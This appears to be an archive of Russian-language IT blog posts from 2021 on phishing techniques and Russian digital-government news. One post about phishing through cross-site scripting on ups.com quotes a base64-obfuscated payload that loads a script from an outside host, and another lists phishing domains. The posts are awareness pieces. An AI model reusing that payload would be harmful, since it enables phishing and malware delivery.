Время IT | IT Time

2021-09-12 17:45:02 ​Про фишинг с использованием сервисов сокращения ссылок

Сервисы сокращения ссылок давно пользуются популярностью, особенно при проведении почтовых рассылок.

Наверняка вам не раз доводилось переходить по ссылкам через bit.ly, goo.gl, clck.ru и другие сервисы сокращения. Разумеется, подобными службами пользуются и фишеры. Но простое сокрытие фишинговой ссылки в сервисе сокращения – слишком простой ход. Такие ссылки довольно просто проверяются и блокируются многими почтовыми серверами и/или клиентами.

А фишеры – народ изворотливый и гораздый на выдумки. Вот недавно ребята из Microsoft опубликовали отчет об исследовании очередной фишинговой кампании, которая строилась с использованием открытых сервисов сокращения ссылок и верификации по капче.

Пользователи получали фишинговые письма, в которых использовались короткие ссылки. Эти короткие ссылки указывали на вполне известные и доверенные ресурсы, но в конец ссылок добавлялся в качестве параметра адрес фишингового сайта.

В данном случае, это были сайты в доменных зонах .online, .xyz, .shop, .club. Причём доменам выбирались достаточно короткие имена, так что не всегда было сходу понятно, что это вообще полноценный URL. Вот примеры:

a-cl.xyz
p-at.club
f-io.online

Переходя по такой ссылке, пользователь переадресовывался на фишинговый сайт, где размещалась страница с проверкой по капче, ввод которой позволял фишерам поймать сразу двух зайцев:

- у пользователей создавалось ощущение легитимности посещаемого ресурса;
- корпоративные сервисы защиты от спама не всегда могли пройти шаг проверки по капче, и как следствие, могли не заблокировать ссылку в письме как потенциально опасную.

Далее, всё уже шло по стандартному сценарию: перевод на фейковую страницу ввода пароля, и кража злоумышленниками учётных данных пользователя.

Из всего сказанного можно сделать следующий вывод: если вы перешли по ссылке из письма, и вас просят ввести логин/пароль или якобы сменить их, то лучше этого не делать. Не поленитесь зайти на привычную вам страницу (или приложение) используемого сервиса и уже там, при необходимости, выполняйте какие-либо действия.

Кстати, многие сервисы коротких ссылок, такие как bit.ly, tinyurl.com, redir.ec, goo.gl и прочие, не только генерируют короткий URL-адрес, но также сохраняют IP-адрес перешедшего по ссылке пользователя и собирают статистику по кликам, их происхождению, используемому браузеру и т.д. Практически всегда это происходит без уведомления пользователя и получения его прямого согласия.

Всё полезное, что кажется бесплатным, на самом деле таковым не является.
[древняя онлайн-мудрость]

#ИБ Открыть/Комментировать

2021-09-06 15:15:15 ​Про фишинг с использованием межсайтового скриптинга

Не всегда в фишинговых письмах используются поддельные доменные имена.

Встречаются весьма продвинутые фишинговые атаки, которые очень непросто распознать потенциальным жертвам, поскольку ссылка из письма ведёт на официальный сайт бренда, но содержит инъекцию вредоносного скрипта из другого источника. Другими словами, используется межсайтовый скриптинг (Cross-site scripting, XSS).

Пример подобной атаки разобран здесь (на английском).

В приведённом примере фишеры рассылали письма якобы от имени службы доставки UPS. В письме говорилось, что клиенту нужно забрать почтовое отправление.

Ссылки из письма вели на официальный сайт ups.com, но были дополнены вставкой вредоносного скрипта по классической схеме XSS-атаки:

src="x" onerror="Function(atob('JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=='))()

Функция atob() после base64-декодирования в качестве параметра получала ссылку на скрипт с другого сайта.

Этот скрипт, в свою очередь, запускал процедуру загрузки документа MS Word на устройство пользователя.

Нюанс в том, что происходила вся эта процедура "внутри" официального сайта UPS (см. картинку к посту) и потому, чаще всего, пользователи открывали данный файл без опасений и разрешали использование в нём небезопасного контента.

Как защищаться от подобного скама? Очень непросто.

Вообще говоря, за защиту от XSS должны отвечать квалифицированные специалисты на стороне владельца сайта.

Обычный пользователь может только внимательно просматривать ссылки в письме (что практически нереально представить в жизни) и проявить настороженность при открытии загруженного файла. Но поскольку загружен то он [якобы] с официального сайта, то сложно рассчитывать на максимальную бдительность.

- Тук-тук!
- Кто там?
- Это я, почтальон Свечкин из UPS
- А вы точно почтальон?
- Конечно, у меня же есть фирменная кепка и велосипед.
- Заходите

#ИБ Открыть/Комментировать

2021-08-25 18:45:07 ​Про омоглифы и другие способы формирования фишинговых ссылок

Омоглифы (встречается также написание гомоглифы) – графически одинаковые или похожие друг на друга знаки, имеющие разное значение. Термин имеет греческое происхождение и пришёл из типографского дела.

Наиболее распространённые омоглифы букв и цифр:
цифра ноль и заглавная буква О (0 и О);
цифра один, строчная латинская L и прописная латинская i (1, l и I).

В зависимости от используемого шрифта, внешний вид этих символов может полностью совпадать или быть плохо различимым для человеческого глаза.

Этим прекрасно пользуются злоумышленники при формировании фишинговых ссылок.

Сравните, например, GOOGLE.COM и G00GLE.COM.

Также у фишеров существует ещё несколько распространённых техник, которые ориентированы на эксплуатацию особенностей чтения текста человеком. Как правило, мы не просматриваем каждую букву слова, а пробегаем взглядом какую-то часть, после чего мозг "считывает" слово целиком.

Среди упомянутых фишерских техник формирования фейковых ссылок, кроме использования омоглифов, распространены:

тайпсквоттинг (замена, удаление или добавление одной или нескольких букв в слове): wikipedia, wikipedya, wikipeda
использование поддоменов (доменов более низкого уровня): insta.gram.com и instagram.com

Ещё одной большой группой омоглифов являются буквы разных языков, имеющие одинаковое начертание. Например, прописные русские и английские A, E, K, M и т.д.

В случае с фишерскими ссылками символы иностранных алфавитов используют не так часто, потому что многие браузеры конвертируют их в так называемый Punycode, и это становится заметным глазу.

Но в других случаях такие трюки очень неплохо проходят.

Например, ещё несколько лет назад были популярны истории, когда в государственных закупках использовали омоглифы в названиях марок автомобилей, чтобы их не находил прямой поисковый запрос.

Сравните: Mercedes и Merсedes. Визуально, разницы никакой, но во втором случае буква с в середине слова – русская.

Кстати, в государственных регистрационных знаках для автомобилей, которые выдаются на территории Российской Федерации, используются только буквы, являющие омоглифами к буквам латинского алфавита.

В общем, нужен глаз да глаз.

Смотрим в ссылку, видим... вилку

#термин Открыть/Комментировать

2021-08-23 17:45:04 ​Про фишинг

Фишинг (англ. phishing) –распространённый вид мошенничества, ориентированный на получение от жертвы конфиденциальных данных: номеров банковских карт, реквизитов учётных записей, паролей и т.д.

Часто фишинг относят к методам социальной инженерии. Сам термин возник от английского fishing (рыбалка) с заменой первой буквы на буквосочетание ph, что не меняет его произношения, но, как считается, даёт отсылку к фрикингу (phreaking) – использованию публичных телефонных (phone) линий для совершения бесплатных звонков, включая международные. Фрикинг был популярен в 80-90 годах прошлого века.

Принцип фишинга довольно прост: подбросить жертве наживку в виде, например, фальшивого сообщения от банка или соцсети, и заставить ввести нужные атакующему данные на поддельной странице, замаскированной под официальную.

Фишинг может быть как самодостаточной атакой, так и элементом более сложных атак, например при внедрении вредоносов-вымогателей (ransomware). В последнем случае, фишинг часто используется для проникновения злоумышленников внутрь корпоративных сетей или к ресурсам государственных организаций. Подобные атаки обычно очень хорошо таргетированы (сопровождаются предварительным сбором детализированных данных о работниках организации, её IT-инфраструктуре и т.д.)

Меры противодействия фишингу должны объединять усилия корпоративной службы безопасности и самих пользователей (потенциальных жертв).

Основной технический способ защиты учётных данных – это введение двухфакторной аутентификации (2FA).

Также желательно проводить регулярные обучающие мероприятия с пользователями по выработке навыков выявления фишинговых атак. Обычно, даётся примерно такой набор рекомендаций:

- всегда проверяйте реальный почтовый адрес отправителя сообщения;
- сохраняйте спокойствие и относитесь критично к письмам с пометкой "важно", "срочно";
- обращайте внимание на ошибки в тексте письма (несогласованные окончания, неправильная орфография);
- с подозрением относитесь к неперсонифицированным обращениям ("уважаемые господа", "коллеги" и т.п.)
- по умолчанию не доверяйте никаким ссылкам и вложениям, представленным в письме;
- не предоставляйте никаких чувствительных (конфиденциальных) данных в ответах на письма, отправители которых вам неизвестны.

#термин #ИБ Открыть/Комментировать

2021-08-19 18:45:04 ​Про использование кодов азбуки Морзе в фишинговых письмах

Недавно команда анализа и защиты от угроз Microsoft 365 опубликовала пост о выявленных случаях использования кодов азбуки Морзе внутри скриптов в фишинговых письмах, которые рассылаются потенциальным жертвам нехорошими товарищами [хакерами].

Такое фишинговое письмо, как правило, представляет собой информацию о выставленном счете на оплату или ином финансовом документе, который прикрепляется к письму в виде вложения.

Подобные письма максимально стараются подстроить под получателя, используя в тексте название его компании и даже её логотип.

Вложение, как правило, маскируется под файл Excel, в действительности являясь HTML-документом (старая техника с "двойным" расширением файла).

После открытия вложенного файла отображается HTML-страница, имитирующая страницу книги Excel, поверх которой открыто окно запроса учётных данных пользователя для работы с Microsoft Office 365.

Цель атакующего – заставить жертву ввести свой реальный логин и пароль, которые, разумеется, тут же становятся скомпрометированными.

В общем, сценарий атаки совершенно не нов. Новеллой является именно использование кодирования символов в виде азбуки Морзе, то есть представление букв и цифр в виде точек и тире.

Для чего это нужно? HTML-файлы, как известно, могут содержать ссылки на внешние JavaScript-ы, которые, в свою очередь, могут содержать вредоносный код. Открытое указание ссылок на такие скрипты грозит тем, что антивирус может их распознать и заблокировать.

По этой причине ссылки на скрипты часто прописываются не в явном виде, а кодируются (маскируются). Ранее для такого кодирования атакующие использовали ASCII-коды или Base64. Теперь вот добавилась схема с использованием азбуки Морзе.

S.O.S.

#новости #ИБ Открыть/Комментировать

2021-08-17 19:15:09 ​Концепция "0-0-0"

На упомянутом форуме "Цифровая эволюция" из уст заместителя министра цифрового развития, связи и массовых коммуникаций Олега Качанова прозвучала одна из целей, к которой, по мнению Минцифры России, должна привести цифровая трансформация в сфере госуправления. Эту цель можно описать в вице концепции "0-0-0": нулевой вход – нулевое ожидание – ноль бумажных документов.

Цель, надо сказать, весьма амбициозная, и в целом – очень интересная. Попробуем подробнее разобраться, что она означает.

Как известно, большинство процессов взаимодействия граждан (а чаще всего – и бизнеса) с государством имеют довольно чёткую последовательность шагов, прописанную в нормативных документах. Чаще всего – в административных регламентах.

Административный регламент содержит информацию о том, какие документы требуются от заявителя для получения услуги, как и сколько по времени происходит процесс предоставления услуги, что является её результатом.

Возьмём, например, услугу получения выписки из домовой книги. Это такая бумага, в которой указано, кто зарегистрирован (прописан) в вашей квартире. Как правило, такой документ требуется при продаже квартиры, и в некоторых других случаях.

Получить данную услугу может собственник либо кто-то из проживающих в квартире, а также лицо, действующее по нотариальной доверенности.

Таким образом, на входе нужно подтвердить личность заявителя и наличие у него права на получение услуги. Затем нужно ожидать подготовки документа (как правило, в МФЦ его выдают в день обращения) и после этого получить на руки требующуюся бумагу с печатью.

В концепции "0-0-0" эта услуга должна выглядеть примерно так:

Нулевой вход: заявитель не предъявляет ни паспорт, ни сведения о прописке, так как они уже есть в его цифровом профиле либо эти данные получаются онлайн путем обращения в базы МВД.

Нулевое ожидание: подтверждение права на получение услуги и собственно формирование электронной выписки происходит также в онлайне.

Ноль бумажных документов: итоговый документ (выписка из домовой книги) формируется в электронной форме, подписывается электронной подписью уполномоченного лица. Кроме того, в идеале, этот документ может сразу отправляться по месту его предоставления (например, в банк).

В общем, очень симпатичная целевая модель рисуется. Но чтобы до неё добраться, нужно приложить немало усилий по подготовке баз в органах власти и налаживанию обмена информацией в онлайне.

Да ещё и необходимые требования по конфиденциальности соблюсти.

#новости Открыть/Комментировать

2021-08-13 12:45:06 ​В Калуге проходит форум "Цифровая эволюция", организованный Минцифрой России.

Министр Максут Шадаев присуствует лично. Он поделился мнением о ходе цифровой трансформации в стране.

Несколько заметок по его выступлению:

Цифровая трансформация - это история не только (и не столько) про ИТ, сколько про изменение процессов во взаимодействии граждан с государством (улучшение пользовательского опыта, новые клиентские стратегии). Даже прозвучала некая целевая парадигма "чиновник-робот".

Пандемия позволила по-другому взглянуть на онлайн-сервисы, они оказались супервостребованы, но инфраструктура госуслуг оказалась не во всём готова. Сейчас всё ОК.

Зато выросла ценность учётной записи в ЕСИА (для доступа в экосистеме госуслуг).

И как следствие - вырос интерес мошенников к этим данным. Минцифры проведён комплекс мероприятий по усилению защиты учётных данных пользователей.

Нехватка IT-кадров - колоссальная. И это одна из ключевых проблем.

От цифровизации не уйти никому (по крайней мере, в госуправлении). Министерство будет продолжать оказывать давление на регионы по ускорению этих процессов. Открыть/Комментировать

2021-08-09 19:15:06 ​Про использование биометрии для идентификации водителей такси и каршеринга

Помните наш пост про Единую биометрическую систему (ЕБС)? Мы ещё тогда поинтересовались у вас, готовы ли вы сдать биометрические данные для дистанционного получения услуг.

Ответы поначалу были более-менее равномерно распределены. А потом что-то случилось со счётчиком (или у где-то у кого-то заклинило кнопку?), и в результате отрицательных ответов набежало почти в 10 раз больше, чем подписчиков на канале.

Удивительный глюк эффект случился. И возможно, неспроста.

Вот недавно Минцифры России разработала и разместила для обсуждения проект постановления Правительства, который предлагает нормативно закрепить сбор и обработку биометрических персональных данных физических лиц в следующих случаях:

а) идентификация водителей легкового такси;

б) идентификация водителей транспортных средств, предоставленных в краткосрочную (до 24 часов) аренду на основе поминутной тарификации физическим лицам для целей, не связанных с осуществлением такими физическими лицами предпринимательской деятельности (каршеринг);

в) осуществление прохода на территорию организаций, организаций финансового рынка посредством системы контроля и управления доступом на территории данных организаций;

г) участие в собрании участников гражданско-правового сообщества

Прибавим сюда недавние сообщения о том, что в московском метро началось тестирование оплаты проезда путем использования системы распознавания лиц при проходе через турникеты (Face Pay), и станет окончательно понятно: за сбор биометрических данных населения где-то наверху взялись всерьёз.

Гюльчатай, открой личико

#новости Открыть/Комментировать

2021-08-07 10:15:07 Джозеф Вайценбаум известен, в первую очередь, как создатель компьютерной программы Элиза (Eliza), которая была представлена им в 1966 (!) году.

Эта программа умела вести диалог с пользователем, имитируя приём у психотерапевта. Большинство источников относят Элизу к ранним формам искусственного интеллекта.

Принцип работы Элизы был относительно прост. Он заключался в распознавании отдельных слов во фразе собеседника и формулировании вопросов на их основе. Сейчас подобную программу назвали бы чат-ботом.

Вайценбаум был весьма удивлён, что многие его знакомые серьёзно отнеслись к Элизе. Сам он считал её относительно простым симулятором.

А позднее и вовсе стал открыто критиковать идеи искусственного интеллекта, полагая, что любому ИИ всегда будет не хватать человеческих качеств при принятии решений. Таких, например, как сострадание.

- Элиза, у меня срыв, мне нужно к психотерапевту
- Хватит ныть. Возвращайся за парту и доделывай домашку.

#цитата Открыть/Комментировать

2021-08-04 10:15:11 ​Про Госключ

Минцифры России продолжает развивать экосистему госуслуг. Вчера на её сайте появилась новость о выпуске приложения "Госключ". Несколько ранее в этом году, напомним, уже были выпущены "ГосДоки", которые позиционировались как альтернатива ношению гражданами при себе бумажных документов.

"Госключ", как следует из пресс-релиза министерства, предназначен для бесплатного создания пользователями портала госуслуг электронной подписи, которая хранится в защищённой и безопасной инфраструктуре электронного правительства.

Разумеется, на самом деле речь здесь идёт про создание ключа, при помощи которого в дальнейшем можно формировать электронную подпись. Собственно, по этой причине приложение и называется "Госключ", а не "ГосЭП" или типа того.

Кстати говоря, данная идея не нова. У налоговой в личном кабинете пользователя уже довольно давно есть возможность формирования "облачного" ключа электронной подписи, при помощи которого можно подписывать, например, подаваемые в электронной форме декларации "3-НДФЛ". Но использовать этот ключ можно только в информационных ресурсах ФНС России.

В случае "Госключа" интерес представляет тот факт, что Минцифры попытается в рамках эксперимента (если точнее - на его втором этапе) наладить выдачу усиленных квалифицированных ключей электронной подписи. В теории это означает, что такой ключ можно использовать для подписания любых юридически значимых документов, в том числе, размещаемых и обращающихся вне портала госуслуг.

Получится ли это сделать и насколько вообще удачным будет эксперимент, узнаем примерно через год. Такой срок на его проведение отведён в постановлении Правительства от 15 июля 2021 г.№ 1207.

#новости Открыть/Комментировать